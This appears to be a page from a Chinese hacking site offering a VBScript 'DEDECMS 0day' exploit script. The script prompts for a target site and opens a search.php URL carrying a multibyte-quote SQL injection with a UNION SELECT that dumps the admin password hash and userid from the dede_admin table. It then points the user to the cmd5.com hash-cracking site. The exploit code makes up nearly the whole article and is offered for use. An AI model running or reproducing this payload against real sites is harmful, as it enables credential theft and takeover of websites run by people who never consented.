arow 您现在的位置: Yes!黑客联盟 >> 技术 >> 黑客技术 >> 黑客文献 >> 正文
专题栏目
织梦的编码转码漏洞vbs版           
织梦的编码转码漏洞vbs版
作者:YesHack.… 文章来源:YesHack.Com 更新时间:2008-9-4 7:08:36 【字体:
DIM a,i,e,ie,cmd5
i=InputBox ("输入目标地址 格式http://www.dedecms.com","DEDECMS 0DAY利用程序 BY Nuke")
If i="" Then
msgbox "请输入地址"
WScript.Quit
End If
e = "/group/search.php?sad=g&keyword=%cf'%20union%20select%201,pwd,user(),4,5,6,7,8,userid,10,11,12,13,14,15,16,17%20from%20dede_admin/* "
ie = i&e
Set a=WScript.CreateObject("InternetExplorer.Application")
a.visible=True
a.navigate ie
Msgbox "暴出值为32位截取24位MD5,取最后16位,破解即可"
msgbox "祝你好运!"
set cmd5 = WScript.CreateObject("WScript.Shell")
cmd5.run ("http://www.cmd5.com")

 


友情提示:如果您对本文章的内容存在疑问请到点此进入论坛进行讨论

文章录入:YesHack    责任编辑:YesHack.Com 
  • 上一篇文章:

  • 下一篇文章:
  •